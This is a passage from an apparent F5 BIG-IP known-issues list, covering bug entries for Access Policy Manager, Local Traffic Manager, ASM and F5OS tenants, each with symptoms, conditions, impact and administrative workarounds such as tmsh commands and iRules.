The given base64 encoded value is legal base64 but the decoded auth-param is unparsable. Such request triggers "HTTP Protocol Compliance" violation when configured to do so and it is indeed triggering, but such request should not trigger "illegal base64 value".

Impact:
A false positive is detected.

Workaround:
None


1489941-2 : PKCE 'code_challenge_methods_supported" to be included in openid-configuration well-know-uri

Component: Access Policy Manager

Symptoms:
OAuth AS does not include PKCE "code_challenge_methods_supported" in openid-configuration well-know-uri

Conditions:
OAuth AS to support PKCE

Impact:
OAuth Client is unaware of the support for OAuth AS and PKCE parsing from the openid-configuration well-know-uri

Workaround:
None


1485557-2 : OAuth token not found for OAuth server with Bearer SSO

Links to More Info: BT1485557

Component: Access Policy Manager

Symptoms:
When the BIG-IP Administrator configures BIG-IP as OAuth RS with OAuth Bearer Single Sign On, WebSSO fails as an empty access token is included as a session variable.

Conditions:
OAuth Scope sets different access_token variables except for the one that is acceptable by WebSSO.

Impact:
BIG-IP Administrator fails to implement a successful OAuth Bearer SSO on OAuth RS.


1481889-4 : High CPU utilization or crash when CACHE_REQUEST iRule parks.

Links to More Info: BT1481889

Component: Local Traffic Manager

Symptoms:
When CACHE_REQUEST iRule stops, the Ramcache filter stays in CACHE_INIT state when it restarts. This causes the request to be processed twice, which causes high CPU usage or a crash when an incorrect address is encountered.

Conditions:
- HTTP Virtual server
- CACHE_REQUEST iRule with ms delay
- Multiple attempts to request a compressed doc

Impact:
- High CPU on boxes with 4G of valid memory after the key is hashed - on smaller boxes, will crash when an invalid address is encountered.

Workaround:
- Removal of CACHE_REQUEST iRule if avoidable


1474877-4 : Unable to download large files through VIP due RST Compression error.

Links to More Info: BT1474877

Component: Local Traffic Manager

Symptoms:
- Download of files exceeding maximum tmm.deflate.memory.threshold fails at client.
- Client receives RSTs (Compression error)

Conditions:
- Virtual server with HTML profile or REWRITE profile.
- Size of decompressed http response from server exceeds max tmm.deflate.memory.threshold value i.e. 4718592 bytes.

Impact:
- Client may lose connection to the server.

Workaround:
- Based on URI matches in the HTTP request, decide which responses should NOT be rewritten (e.g. big downloads) and disable REWRITE profile for the selected responses.
- For example, URI starting with "/headsupp/api/data/compare/measures" :

when HTTP_REQUEST {
   if { [HTTP::uri] starts_with "/headsupp/api/data/compare/measures" } {
      set no_rewrite 1
   }
}
when HTTP_RESPONSE {
  if { $no_rewrite == 1 } {
     REWRITE::disable
  }
}


1473913-6 : Proxy Connections drop due to wrong counting

Links to More Info: BT1473913

Component: Local Traffic Manager

Symptoms:
Proxy Connections are dropped. The reset cause in a package capture indicates "F5RST: Not connected"

Conditions:
Can happen during a DOS attack with standard mitigation mode enabled.

Impact:
Random connections are dropped

Workaround:
Use conservative mitigation mode.


1440409-6 : TMM might crash or leak memory with certain logging configurations

Links to More Info: BT1440409

Component: Local Traffic Manager

Symptoms:
TMM might crash or leak memory with certain logging configurations.

Conditions:
Virtual-to-virtual chaining is used for handling syslog messages.

Impact:
Memory leak or Crash.

Workaround:
None


1438801-1 : VLAN name greater than or equal to 32 characters causes VLAN to lose member information

Links to More Info: BT1438801

Component: TMOS

Symptoms:
If VLAN name is greater than or equal to 32 characters, a tenant running on an r2000 or r4000-series appliance may fail to pass traffic on that VLAN. This occurs because the tenant loses track of the interface/trunk<>VLAN association when attempting to process configuration updates from the F5OS host.

Conditions:
- r2000 or r4000 system
- VLAN member with a name that is 32 characters or longer is assigned to a BIG-IP tenant.

Impact:
Traffic may not pass properly.

Workaround:
Use shorter VLAN names, with a maximum of 31 characters.


1429813-5 : ASM introduce huge delay from time to time

Links to More Info: BT1429813

Component: Application Security Manager

Symptoms:
During high traffic, the response to some requests will be delayed for more than 1 second.

Conditions:
ASM Policy attached to the Virtual Server and during high traffic conditions.

Impact:
Some critical URLs like payment links, will timeout for the user.

Workaround:
None


1411365-1 : CMP forwarded flows can be removed by other CMP forwarded flows incorrectly

Links to More Info: BT1411365

Component: Local Traffic Manager

Symptoms:
BIG-IP may fail to forward server-side traffic if flow forwarding occurs due to an overload scenario, specifically due to flow collisions on the server-side connection when using the source-port preserve-strict option with UDP virtual configuration.

Conditions:
BIG-IP configured with UDP virtual configuration with source-port preserve-strict.

- CMP forwarding occurs when traffic on ingress is managed by a different TMM on egress.
- Overload condition occurs on TMM that leads to forwarding the flow by keeping server-side connection.
- Forwarded flow causes existing connection flow to be removed and interrupts current traffic flow.

Impact:
Forwarding flow removes the existing flow and causes traffic to be dropped.

Workaround:
Clear the existing connection from the connection table. For more information, refer to the article K53851362: Displaying and deleting BIG-IP connection table entries from the command line.


1410441-3 : Large file transfer over SFTP/SSH proxy failure

Links to More Info: BT1410441

Component: Advanced Firewall Manager

Symptoms:
- Large file transfer (>110MB) fails using the SFTP PUT command through a virtual server configured with AFM SSH Proxy.
- Depending on the boundary byte that gets sent from BIG-IP towards the backend server, the server sends back a SSH2_MSG_UNIMPLEMENTED for a packet type corresponding to the incorrect byte being interpreted as the message type.

Conditions:
- SSH Proxy profile attached to BIG_IP Virtual Server.
- Large file (>110MB) is uploaded using PUT command through the virtual server.

Impact:
File transfer fails.

Workaround:
Workaround options are:

- Limit the file transfer rate through the SFTP client.
  Ex:
  sftp -l 1000 <VS-IP>
  put <filename>

- Use a smaller buffer size (eg. 1400).
  Ex:
  sftp -B 1400 <VS-IP>
  put <filename>


1403869-5 : CONNFLOW_FLAG_DOUBLE_LB flows might route traffic to a stale next hop

Links to More Info: BT1403869

Component: TMOS

Symptoms:
Pool members configured with IP encapsulation or any type of flow using CONNFLOW_FLAG_DOUBLE_LB flag might take some time to refresh its nexthops.

Conditions:
BIG-IP receives an ECMP route towards a server over two different BGP peers and the server is a pool member with IPIP encapsulation enabled. One of the BGP peers goes down and the route gets removed immediately, but BIG-IP is still forwarding traffic to this peer for the next few seconds, even though tmm.inline_route_update is enabled.

Impact:
The connection is using the old, invalid next hop for a few seconds.

Workaround:
None


1399369-2 : While upgrading standby device, active device is going to standby mode for few seconds, and traffic loss is observed.

Links to More Info: BT1399369

Component: Local Traffic Manager

Symptoms:
Traffic loss due to failover.

Conditions:
-- F5OS with BIG-IP tenants.
-- Execute failovers on the active device by running "tmsh run sys failover standby".
-- Proceed to upgrade F5OS on the current standby device.
-- Note that during this process, the device previously in Active mode will transition to standby mode momentarily, typically lasting around 20 seconds.

Impact:
Traffic loss lasting up to 20 seconds approx.

Workaround:
None


1399017-6 : PEM iRule commands lead to TMM crash

Links to More Info: BT1399017

Component: Policy Enforcement Manager

Symptoms:
In a few circumstances PEM iRule commands lead to a TMM crash.

Conditions:
PEM iRule commands

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


1397001-2 : Memory leak in websense when RTU is updated

Links to More Info: BT1397001

Component: Access Policy Manager

Symptoms:
URLDB stops responding and you may observe below logs

crit tmm5[27171]: 01790602:2: [C] <IP:port> -> <IP:port>: (ERR_EXPIRED) URL category lookup failed

Conditions:
Websense database update.

Impact:
SSL Orchestrator traffic cannot be forwarded.

Workaround:
Restart urldb:
bigstart restart urldb

Impact of workaround: restarting urldb causes traffic to be disrupted while urldb is restarting.


1395349-1 : The httpd service shows inactive/dead after "bigstart restart httpd"

Links to More Info: BT1395349

Component: TMOS

Symptoms:
The systemd service unit for httpd shows a status of inactive (dead) after you restart httpd using bigstart restart httpd. For example:

# systemctl status httpd
* httpd.service - LSB: start and stop Apache HTTP Server
   Loaded: loaded (/etc/rc.d/init.d/httpd; enabled; vendor preset: enabled)
   Active: inactive (dead) since Mon 2023-11-13 09:55:06 GMT; 5s ago



In versions v15.1.10.5 and above in v15.1.x, v16.1.5 and above in v16.1.x, and v17.1.1.4 and above, if a system is affected by this and then a user or process restarts httpd via systemd, the GUI will stop responding and return 403 Forbidden errors. This happens when attempting to renew or update the device certificate via the GUI.

Conditions:
Executing the command bigstart restart httpd. This will also happen behind-the-scenes when making HTTP configuration changes via tmsh/the GUI/iControl.

Impact:
httpd is running normally, but systemd is not aware of it.

Workaround:
To confirm httpd is running, you can use the following commands:

bigstart status httpd

OR

ps ax | grep '[h]ttpd'

If you would like to clear the stale state, restart httpd via its systemd service unit twice:

systemctl restart httpd && systemctl restart httpd


If the GUI is returning 403 Forbidden errors for everything, restart httpd ("systemctl restart httpd && systemctl restart httpd").


1379649-5 : GTM iRule not verifying WideIP type while getting pool from TCL command

Links to More Info: BT1379649

Component: Global Traffic Manager (DNS)

Symptoms:
When the pool name is same for different pool types, the GTM iRule cannot segregate the pool types thus giving a wrong DNS response.

Conditions:
-- Both A/AAAA same name WideIP and pools.
-- GTM iRule with pool command pointing to common pool name in different WideIP types.

Impact:
Traffic impact as a non-existent pool member address in DNS response.

Workaround:
None


1377737-3 : SSL Orchestrator does not pass traffic when MAC masquerading is configured on R4k or R2k systems

Component: TMOS

Symptoms:
In BIG-IP tenants launched on R4x00/R2x00 systems, configuring a MAC Masquerade address on the SSL Orchestrator (SSL Orchestrator) egress port prevents traffic from passing.

Conditions:
-- R4x00 or R2x00 systems
-- BIG-IP Tenant
-- High availability (HA) configured in BIG-IP
-- MAC Masquerade address configured on SSL Orchestrator egress port

Impact:
Egress traffic on the SSL Orchestrator port will be dropped in the physical NIC card. Hence SSL Orchestrator egress traffic on the port wouldn't be received on L2 device.

Workaround:
None


1365769-2 : When multiple vlans are in the zone, only some vlans match the ACL-Policy

Links to More Info: BT1365769

Component: Advanced Firewall Manager

Symptoms:
Packets are dropped based on the default match rule instead of actual expected rule.

Conditions:
Firewall policies created with Zone include Route Domain (RD) with two or more VLANs in the created Zone.

Impact:
The packets are dropped based on the default match rule instead of using the RD rule match to drop.


1359817-3 : The setting of DB variable tm.macmasqaddr_per_vlan does not function correctly

Links to More Info: BT1359817

Component: F5OS Messaging Agent

Symptoms:
TMM is not configuring L2 listener entry for a new MASQUEREDE MAC created from a base MAC and VLAN ID when the DB variable tm.macmasqaddr_per_vlan is true.

Conditions:
- F5OS Tenant
- MAC MASQUEREDE is configured
- DB variable tm.macmasqaddr_per_vlan is true

Impact:
Connectivity issues may occur, pinging a self-IP will fail.

Workaround:
None


1350485-2 : When the parameter value contains '@', domain name is not properly extracted

Links to More Info: BT1350485

Component: Application Security Manager

Symptoms:
Request is blocked with Illegal Parameter type violation

Conditions:
-- Parameter value type set to 'Auto Detect'
-- Illegal data type violation is enabled

Impact:
Request blocked if the parameter Url values having '@' followed by other special characters

Workaround:
Change the type to alpha-numeric


1329509-4 : TCL error 'ERR_VAL (line 1) invoked from within "HTTP::path"'.

Links to More Info: BT1329509

Component: Local Traffic Manager

Symptoms:
Under specific conditions, when the client accesses an HTTP(S) virtual server, an iRule execution error occurs. Client-side HTTP(S) connection is terminated by RST when an iRule execution error occurs.

  err tmm[xxxxx]: 01220001:3: TCL error: /Common/test-rule <HTTP_REQUEST> - ERR_VAL (line 1) invoked from within "HTTP::path"

Conditions:
This issue occurs under the following conditions:

-- HTTP::path command is used on an iRule.
-- The iRule is attached to an HTTP(S) virtual server.
-- Client's HTTP(S) request URI includes square bracket character, "[" (0x5b) or "]" (0x5d).
-- Client's HTTP(S) request URI includes only opening square bracket "[" or only closing square bracket "]", for example, "GET [ HTTP/1.0\r\n\r\n".

NOTE: When an explicit proxy is configured in the HTTP profile, a client request containing only an opening square bracket "[" will result in the BIG-IP responding with a 400 Bad Request error. In this case, the TCL error may not be visible.

Impact:
The iRule execution fails with a TCL error, as shown in the example below, and the client will receive a TCP RST from the virtual server when the iRule fails to execute.

  err tmm[xxxxx]: 01220001:3: TCL error: /Common/test-rule <HTTP_REQUEST> - ERR_VAL (line 1) invoked from within "HTTP::path"

Workaround:
Add "-normalized" command option to HTTP::path command.

ltm rule /Common/test-rule-normalized {
   when HTTP_REQUEST {
      if { [HTTP::path -normalized] contains "test" } {
         HTTP::respond 200 -content "OK !!!\n"
      } else {
         HTTP::respond 200 -content "Hit \"else\" statement !!!\n"
      }
   }
}

Note: Adding the "-normalized" command option can change the URI, therefore it is highly recommended to thoroughly test and verify its behaviour before implementing the workaround in a production environment.


1327649-4 : Invalid certificate order within cert-chain associated to JWK configuration

Links to More Info: BT1327649

Component: TMOS

Symptoms:
An error occurs while validating the certificate and certificate chain in JSON web key configuration:

General error: 01071ca4:3: Invalid certificate order within cert-chain (/Common/mycert.crt) associated to JWK config (/Common/myjwk). in statement [SET TRANSACTION END]

Conditions:
Issue occurs when the certificate chain contains three or more certificates.

The proper order in issuing:
endpointchild
|
 endpoint
 |
  intermediate
   |
    ca

Impact:
You are unable to create a policy with key configuration for OAuth when the certificate chain contains more than two certificates.

Workaround:
Note that there is no impact when the certificate chain order is valid and contains only two certificates in the chain.


1325737-1 : Standby tenant cannot access floating traffic group when MAC masquerade is enabled

Links to More Info: BT1325737

Component: TMOS

Symptoms:
A standby BIG-IP tenant running on an r2000 or r4000 appliance cannot access addresses in the floating traffic group if MAC masquerade is enabled. For instance, the standby tenant will not be able to ping the floating self IP address.

External devices can access the floating self IP address without issue.

If the tenants swap HA roles (the active device becomes standby, and the standby device becomes active), the problem follows the standby device -- the newly-standby system is not able to ping the floating self IP address.

Conditions:
-- F5 r2000 or BIG-IP r4000 system
-- BIG-IP tenant with MAC masquerade configured for floating traffic group

Impact:
Standby tenant unable to access resources in the floating traffic group when MAC masquerade is configured.

Workaround:
None


1325649-3 : POST request with "Expect: 100-Continue" and HTTP::collect + HTTP::release is not being passed to pool member

Links to More Info: BT1325649

Component: Local Traffic Manager

Symptoms:
After upgrading from a BIG-IP version prior to v16.1.0 to BIG-IP v16.1.0 or later, one specific virtual-server is not working as expected and unable to forward the POST request towards the pool member.

Conditions:
1) Upgrade to v16.1.0 or later

2) Send a POST request from client with "Expect: 100-Continue".

3) Attach an irule using http::collect plus http::release to the Virtual Server.

Impact:
Cannot send POST requests from client to server

Workaround:
If ASM is provisioned, a transparent ASM policy can be a workaround.

1. Create a transparent ASM policy
At GUI Security >> Application Security: Security Policies
Click Create
Fill in following
Policy name: <unique policy Name>
Policy Type: Security(Default)
Policy Template: Fundamental (Default)
Leaning and Blocking
Enforcement Mode: Transparent
Save
Click the policy name created above, and modify following
Policy Building Learning Mode: Disabled
Save and Apply Policy

2. Enable Application Security Policy with the ASM Policy created above at the LTM Virtul Server Security configuration.


1322413-5 : After config sync, FQDN node status changes to Unknown/Unchecked on peer device

Links to More Info: BT1322413

Component: TMOS

Symptoms:
If changes are made to the FQDN node configuration, which has a node monitor configured, and the configuration is synced to a device group, ephemeral nodes generated from the FQDN node may show Availability as “unknown” and Monitor Status as “unchecked”.

Conditions:
This may occur on versions of BIG-IP with fixes for ID724824 and ID1006157, under the following conditions:
- BIG-IP systems are configured in a device group
- The device group is configured for Manual Sync (Full or Incremental)
- One or more FQDN nodes are configured with a node monitor (which could be the Default Node Monitor)
- A change is made to the configuration of the FQDN node
- A Full configuration sync is performed (by a Manual sync with the device group configured for a Full sync, as an automatic fallback/recovery action from a failed Incremental sync, or by using the “force-full-load-push” keyword):
   tmsh run cm config-sync to-group example-group force-full-load-push

Impact:
The affected nodes will be displayed with an Availability as “unknown” and Monitor Status as “unchecked”.

Workaround:
To resolve this condition, remove and add the node monitor:
- Remove the node monitor from the FQDN node configuration (or from default-node-monitor):
   tmsh mod ltm node example monitor none
   (tmsh mod ltm default-node-monitor rule none)
- Sync this change to the device group (Incremental sync)
- Add the node monitor again to the FQDN node configuration (or to default-node-monitor):
   tmsh mod ltm node example monitor my_node_monitor
   (tmsh mod ltm default-node-monitor rule my_node_monitor)
- Sync this change to the device group (Incremental sync)


1316481-4 : Large CRL file update fails with memory allocation failure

Component: TMOS

Symptoms:
When updating a large CRL file in BIG-IP using tmsh, the file may be partially read due to internal memory allocation failure.

Please note that the size of the CRL file causing this issue varies across hardware types, network bandwidth and usage, and system resources.

Conditions:
1. Using tmsh, large CRL file is updated to an existing CRL.
2. This large CRL file is attached to multiple profiles.
3. The tmsh modify command is used multiple time in a short span of time that leads to the memory crunch.

Impact:
When large CRL file is attached to the profile which was partially read due to memory allocation failure, the profile gets successfully updated. Connections to VIP with this profile may have unexpected results. For e.g. client connecting to VIP with a revoked client certificate will succeed as the CRL was only partially read.

Workaround:
1. Dynamic CRL / CRLDP on client-ssl profile can be configured to dynamically verify SSL certificate revocation status.
2. OCSP can be enabled on client-ssl profile to validate SSL certificate revocation status.


1305117-2 : SSL profile "no-dtlsv1.2" option is left disabled while upgrading from v14.x or v15.x to 17.1.0

Links to More Info: BT1305117

Component: TMOS

Symptoms:
Starting from 16.0.0, given DTLSv1.2 support, "no-dtlsv1.2" option is newly available on SSL profile. Default value is "no-dtlsv1.2" option enabled.

While upgrading from older version to 16.0.0 or later, by default "no-dtlsv1.2" option is to be automatically enabled with following notification message.

> bigip1 warning mcpd[XXXX]: 0107185a:4: Warning generated, for version 16.0.0 or greater : /Common/[SSL-profile-name], default option no-dtlsv1.2 set.

However, when user directly upgrades from v14.x/v15.x to v17.1.0, "no-dtlsv1.2" option may not be automatically enabled on SSL profile.

Conditions:
- roll-forward upgrade from v14.x/v15.x to v17.1.0. upgrade from v16.x to v17.1.0 is not affected.

- custom client|server-ssl profile configured on pre-upgrade version v14.x/v15.x

Impact:
After upgrade to 17.1.0, "no-dtlsv1.2" option may not be enabled on SSL profile.

Workaround:
After upgrade to 17.1.0, manually enable "no-dtlsv1.2" option.


1298225-1 : Avrd generates core when dcd becomes unavailable due to some reason

Links to More Info: BT1298225

Component: Application Visibility and Reporting

Symptoms:
Avrd core file generates.

Conditions:
When avrd is writing to the external device and that device is unavailable temporarily.

Impact:
Potential system impact.

Workaround:
None


1295217-1 : When provision.1nic is set to forced_enable the mgmt interface does not respond to ICMP

Links to More Info: BT1295217

Component: TMOS

Symptoms:
When provision.1nic is set to forced_enable the mgmt interface does not respond to ping requests or other ICMP messages.

Conditions:
Provision.1nic is set to forced_enable

Impact:
Not able to ping the mgmt interface.

Workaround:
/sbin/iptables -t raw -I vadc_rawsock_in -p icmp -j ACCEPT


1294141-6 : ASM Resources Reporting graph displays over 1000% CPU usage

Links to More Info: BT1294141

Component: Application Visibility and Reporting

Symptoms:
The ASM resources graph which is present under Security > Reporting > ASM Resources > CPU Utilization displays over 1000% CPU usage when ASM is under load. The unit is percentage so it should be below 100.

Conditions:
- ASM should be under load and utilizing most of CPU cycles.

Impact:
Reporting graph displays incorrect percent value.

Workaround:
None


1290937-2 : 'contentWindow' of a dynamically genereated iframe becomes null

Component: Access Policy Manager

Symptoms:
A web application using iframes may not work/render as expected using Portal Access.

Conditions:
A web application attempts to configure 'contentWindow' for an iframe while the Portal Access feature is in use.

Impact:
Web Application through Portal Access may fails to work/render as expected

Workaround:
Workaround: Using a customized irule/ifile to return un-patched 'contentWindow' from cache-fm*.js file. ifile has modern cache-fm file.

when CLIENT_ACCEPTED {
  ACCESS::restrict_irule_events disable
}

when HTTP_REQUEST {
 if {
   [HTTP::path] ends_with "/cache-fm-Modern.js"
 } {
   HTTP::respond 200 content [ifile get cachefmUploadIssueWorkaround]
 }
}


1282029-1 : Logging suspicious vector feature is not supported for tcp-flags-uncommon vector on upgrade to BIG-IP 17.1.0

Links to More Info: BT1282029

Component: Advanced Firewall Manager

Symptoms:
The following log is observed in the console or /var/log/ltm logs:

Logging 01071d5e:3: DOS attack data (tcp-flags-uncommon): Suspicious vector feature is not supported for tcp-flags-uncommon vector.

If this is after an upgrade it's likely the configuration will fail to load, which in turn will cause memory provisioning not to complete leaving the system provisioned for LTM only. This may leave insufficient 4KB page memory for the actual provisioning, for example if ASM is provisioned. The unit may show low memory symptoms such as oom killer activity, unresponsive management, cores due to daemon heartbeat timeout.

Conditions:
1. The Only Count Suspicious Events option is enabled or the attribute suspicious is true on TCP Push Flood vector.
2. Upgrade to BIG-IP 17.1.0.

Impact:
The following log is observed in the console or /var/log/ltm logs:

Logging 01071d5e:3: DOS attack data (tcp-flags-uncommon): Suspicious vector feature is not supported for tcp-flags-uncommon vector. in the console or /var/log/ltm

Failure to load configuration may be shown a few lines later:
  emerg load_config_files[13166]: "/usr/bin/tmsh -n -g -a load sys config partitions all " - failed.

Workaround:
1. Confirm config:
grep "suspicious true" /config/bigip.conf

2. Backup bigip.conf:
cp /config/bigip.conf /config/bigip.conf.bak_ID1282029

3. Change affected configuration values:
sed -i 's/suspicious true/suspicious false/g' /config/bigip.conf

4. Reload MCPD per K13030. AFM comes back up with config loaded fine.


1280141-4 : Platform agent to log license info when received from platform

Links to More Info: BT1280141

Component: F5OS Messaging Agent

Symptoms:
Platform agent to add log to print license info on activated/reinstalled for debuggability.

Conditions:
License activated or reinstalled on platform.

Impact:
No impact

Workaround:
None


1277389-1 : HSB transmitter lockup

Links to More Info: BT1277389

Component: TMOS

Symptoms:
Packets aren't received on the software rx side leading to traffic loss

Conditions:
Unknown

Impact:
HSB lockup with SIGFPE TMM core. Traffic disrupted while tmm restarts.

Workaround:
None


1268373-8 : MRF flow tear down can fill up the hudq causing leaks

Links to More Info: BT1268373

Component: Service Provider

Symptoms:
TMM Memory leaks are observed when MRF flows were torn down at once and the hud queue was full.

Conditions:
When the message queue becomes full.

Impact:
TMM memory leak

Workaround:
None


1256757-1 : Suspect keymgmtd memory leak while using dynamic CRL.

Component: TMOS

Symptoms:
keymagmtd's memory size steadily increases. Specifically, in the emdeviced memory size.

Impact:
keymgmtd might crash due to out of memory conditions.

Workaround:
Need to reboot the machine to reset the memory usage.


1231889-5 : Mismatched VLAN names (or VLANs in non-Common partitions) do not work properly BIG-IP tenants running on r2000 / r4000-series appliances

Links to More Info: BT1231889

Component: Local Traffic Manager

Symptoms:
When a VLAN configured in the tenant does not have the same name as the VLAN on in F5OS or the VLAN in the tenant is created in a partition other than "Common", VLANs may not pass traffic properly without manual configuration.

If any such VLANs exist, newly-configured VLANs may also exhibit this issue, even if the VLAN is in Common and has a name that matches the name in F5OS.

The system will have log messages similar to the following; these errors will still occur even once the workaround has been applied.

Feb 15 15:39:49 r4000-1.example.com err mcpd[19522]: 01070094:3: Referenced vlan (/Common/external) is hidden, does not exist, or is already on another instance.
Feb 15 15:39:49 r4000-1.example.com err chmand[19520]: 012a0003:3: hal_mcp_process_error: result_code=0x1070094 for result_operation=eom result_type=eom


Tenants running on an r2000 or r4000-series appliance need to know the VLAN<>interface associations, but the system is not able to populate this information when the VLAN is not in the Common partition. VLANs may not have any 'interfaces' referenced, or will have 'interfaces' that are not in-sync with the configuration on the F5OS host. For example:

R2000# show running-config interfaces interface LAG; show running-config vlans vlan 47
interfaces interface LAG
 config type ieee8023adLag
 config description ""
 aggregation config lag-type LACP
 aggregation config distribution-hash src-dst-ipport
 aggregation switched-vlan config trunk-vlans [ 42 47 ]
!
vlans vlan 47
 config vlan-id 47
 config name vlan_47
!

R2000#

[root@tenant:Active:Standalone] config # tmsh list net vlan /ottersPart/vlan_47
net vlan /ottersPart/vlan_47 {
    dag-adjustment none
    if-index 240 # <-- interfaces is not listed
    partition ottersPart
    [...]
    tag 47
}
[root@tenant:Active:Standalone] config #




[root@tenant:Active:Standalone] config # tmsh list net vlan /ottersPart/vlan_47
net vlan /ottersPart/vlan_47 {
    dag-adjustment none
    if-index 240
    partition ottersPart
    interfaces { # <-- configuration with a workaround in place
        LAG {
            tagged
        }
    }
    [...]
    tag 47
}

Conditions:
- BIG-IP tenant running on r2000 and r4000-series platforms
- VLANs moved to partitions other than "Common", or renamed so that the name does not match between hypervisor and tenant.

Impact:
Partitions other than the Common partition cannot have VLANs. VLANs created in other partitions will not be operational in the data path.

If such VLANs exist in the tenant, newly added VLANs will also exhibit this issue.

Workaround:
In the BIG-IP tenant, modify all VLAN objects to have 'interfaces' that align with the configuration on the host.

For example, for the VLAN 47 described above, the VLAN should be listed as being 'tagged' on the 'LAG' trunk:

tmsh modify net vlan /ottersPart/vlan_47 interfaces replace-all-with { LAG { tagged } }
tmsh save sys config


1230109-1 : Mcpd memory and CPU increase while getting route stats

Links to More Info: BT1230109

Component: TMOS

Symptoms:
Mcpd CPU usage is high after several hours of repeated requests to /mgmt/tm/net/route/stats. Mcpd can crash and restart.

Conditions:
There are two known paths to the issue:
(1) Repeated making authenticated calls to the /mgmt/tm/net/route/stats endpoint.
(2) Opening a long term tmsh shell and repeatedly checking the route table (show net route).

Impact:
Mcpd memory and CPU increases; if unchecked, mcpd can crash and restart.

Workaround:
(1) Avoid checking the /mgmt/tm/net/route/stat endpoint excessively.
(2) Close tmsh session periodically.


1190753-1 : HTTP/2 Virtual Server ignores customized HTTP known-methods list

Links to More Info: BT1190753

Component: Local Traffic Manager

Symptoms:
An HTTP2 virtual server does not transfer the client request to the backend pool member.

Conditions:
- HTTP profile "Unknown Method : Reject".
- HTTP profile custom "Known Methods" list has non-default values, such as "PATCH".
- HTTP2 profile (and also HTTP profile) is attached to the virtual server.
- Client request is HTTP/2. And HTTP/2 request method is custom one (== method which isn't set as default "known-methods").

Impact:
HTTP2 virtual server traffic is disrupted.

Workaround:
None


1189909-1 : Active SSL Connections Curve is always kept at Zero on Performance Graph

Links to More Info: BT1189909

Component: Local Traffic Manager

Symptoms:
In the BIG-IP GUI, if a user navigates to Statistics :: Performance Reports : Performance Reports, then clicks "View Detailed Graph", next to "Active Connections" is a graph named Active SSL Connections.

Even though many client SSL connections were received by SSL virtual servers, the SSL Client curve in the graph always shows 0.

The same behavior is seen via CLI with the 'tmsh show sys performance all-stats historical detail' output where the output displays all zeroes within Active SSL Connections for SSL Client.

Conditions:
SSL connections exist from a client over a period of time.

Impact:
You are unable to determine how many active SSL/TLS connections are present.

Workaround:
Use the alternate method mentioned in article K76898322 to see the Active client-side SSL connections.


1183901-9 : VLAN name greater than 31 characters results in invalid F5OS tenant configuration

Links to More Info: BT1183901

Component: TMOS

Symptoms:
VLAN names 32 characters or longer results in invalid BIG-IP tenant configuration, and mcpd errors.

01070712:3: Internal error, object is not in a folder: type: vlan id: /Common/this_is_a_very_long_vlan_name_32

On F5OS tenants, mcpd, devmgmtd and lind restart in a loop.

Conditions:
VLAN with a name that is 32 characters or longer is assigned to a BIG-IP tenant.

Impact:
-- Invalid configuration
-- mcpd errors
-- Blank VLAN name in webUI of tenant

Workaround:
Use shorter VLAN names, with a maximum of 31 characters.


1168245-1 : Browser is intermittently unable to contact the BIG-IP device

Links to More Info: BT1168245

Component: TMOS

Symptoms:
When the coloradvisory probes generated by Javascript loaded on the browser do not get responded by the BIG-IP device within 30 seconds, the browser JS generates a pop-up message "Unable to contact BIG-IP device".

Conditions:
- MCPD is busy serving requests.
- Multiple browser connections to the BIG-IP.
- HTTP GET request from browser JS for /xui/update/configuration/alert/statusmenu/coloradvisory does not get responded within 30 seconds (default timeout).

Impact:
Browser frequently sees the BIG-IP as unavailable, causing interruptions to management of the device via the GUI.

Workaround:
1. Increase memory allocated to tomcat and restjavad.

   tmsh modify sys db provision.tomcat.extramb value 512
   tmsh modify sys db provision.restjavad.extramb value 2227

NB these are very large values, not suitable for most systems. It is probably best to increase tomcat heap size by 50MB a time, and restjavad by 200MB a time (value 600, 800, etc).
To have provision.restjavad.extramb values will be capped in effect to 384 + value of provision.extramb.
Both tomcat and restjavad need to be restarted to have changes take effect. restjavad will log startup info in ltm log.

2. Adjust the browser-based Javascript status update interval and timeout.

   2.1. Remount /usr partition as read-write using the command:
       
        mount -o remount,rw /usr

   2.2. Edit the file /usr/local/www/xui/framework/scripts/variables.js, and modify the variables: time_updateXui to 8, and timeout_status to 60.

        Default values are:

          var time_updateXui = 5; // Seconds
          var timeout_status = 30; //Timeout value for XUI status update

        Change these values to:

          var time_updateXui = 8; // Seconds
          var timeout_status = 60; //Timeout value for XUI status update

   2.3. Remount /usr partition back to read-only.

        mount -o remount,ro /usr

3. Restart associated daemons:

   bigstart restart httpd
   bigstart restart tomcat
   bigstart restart restjavad


1166929-2 : [AdminUI][Rewrite Profile][PA] Add "*://*" to to rewrite list if an RCL has been entered

Links to More Info: BT1166929

Component: Access Policy Manager

Symptoms:
"Rewrite-List" field is empty Rewrite profile configuration

Conditions:
Portal Access configuaration

Impact:
Rewrite may not work as expected

Workaround:
Add "*://*" manually for Rewrite-List


1137269 : MCPD fails to reply if a request is proxied to another daemon and the connection to that daemon closes

Links to More Info: BT1137269

Component: TMOS

Symptoms:
MCPD does not reply to the request if the publisher's connection closes or fails. In this case, when bcm56xxd
is restarted, the perceivable signs of failure are:
- The snmpwalk failing with a timeout and
- The "MCPD query response exceeding" log messages.

Conditions:
1) Configure SNMP on the BIG-IP to run snmpwalk locally on the BIG-IP.
2) From the first session on the BIG-IP, run a snmpwalk in the while loop.
    
while true;do date; snmpwalk -v2c -c public 127.0.0.1 sysDot1dbaseStat;sleep 2;done
Sample output:
Sat Aug 21 00:57:23 PDT 2021
F5-BIGIP-SYSTEM-MIB::sysDot1dbaseStatResetStats.0 = INTEGER: 0
F5-BIGIP-SYSTEM-MIB::sysDot1dbaseStatMacAddr.0 = STRING: 0:23:e9:e3:8b:41
F5-BIGIP-SYSTEM-MIB::sysDot1dbaseStatNumPorts.0 = INTEGER: 12
F5-BIGIP-SYSTEM-MIB::sysDot1dbaseStatType.0 = INTEGER: transparentonly(2)

3) From a second session on the BIG-IP restart bcm56xxd

bigstart restart bcm56xxd

4) The snmpwalk will continually report the following:

Timeout: No Response from 127.0.0.1

      And snmpd will continually log "MCPD query response exceeding" every 30 seconds in /var/log/ltm.

Impact:
SNMP stopped responding to queries after upgrade.

Workaround:
Restart SNMP.


1136905-2 : Request for Portal Access Hosted Content are RST with "No available SNAT addr"

Links to More Info: BT1136905

Component: Access Policy Manager

Symptoms:
A RST occurs with the following message in /var/log/apm:
- No available SNAT addr

Conditions:
- Portal Access with Hosted-Content.

Impact:
Unable to access hosted-content resources.

Workaround:
Use the following command:
- tmsh modify sys db ipv6.enabled value false


1134257-6 : TMM cores when pingaccess profile is modified multiple times and configuration is loaded

Links to More Info: BT1134257

Component: Local Traffic Manager

